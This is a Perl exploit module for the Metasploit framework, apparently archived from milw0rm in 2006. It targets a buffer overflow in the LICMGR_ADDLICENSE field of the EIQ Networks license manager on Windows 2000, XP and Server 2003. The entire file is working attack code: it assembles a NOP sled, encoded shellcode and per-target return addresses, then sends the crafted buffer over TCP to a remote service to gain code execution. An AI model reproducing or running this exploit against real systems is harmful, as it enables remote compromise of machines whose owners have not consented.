#!/usr/bin/perl -w #metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs package Msf::Exploit::EiQ_License_494; use base "Msf::Exploit"; use strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'EIQ License Manager Overflow', 'Authors' => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'win2000', 'winxp' ], 'Priv' => 0, 'AutoOpts' => { 'EXITFUNC' => 'seh' }, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 10616], }, 'Payload' => { 'Space' => 494, 'BadChars' => "\x00\x0a\x0d\x40\x26", }, 'Description' => Pex::Text::Freeform(qq{ This module exploits the buffer overflow found in the LICMGR_ADDLICENSE Field of EIQ networks network analyser this module exploits buffers of 494 bytes in size. This module should work on all EIQ branded analysers. Exploitation assistance from KF. }), 'DefaultTarget' => 1, 'Targets' => [ ['Windows 2000 SP0-SP4 English', 0x750316e2], # call ebx ['Windows XP SP1/SP2 English', 0x77db64dc ], # jmp ebx ['Windows Server 2003 SP0/SP1 English', 0x77d16764 ], # jmp ebx ], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; my $nops = $self->MakeNops(494 - length($shellcode)); my $ret = pack("V", $target->[1]); my $evil = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&"; my $s = Msf::Socket::Tcp->new ( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), ); if ($s->IsError) { $self->PrintLine('[*] Error creating socket: ' . $s->GetError); return; } $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1])); $s->Send("$evil"); return; } # milw0rm.com [2006-07-26]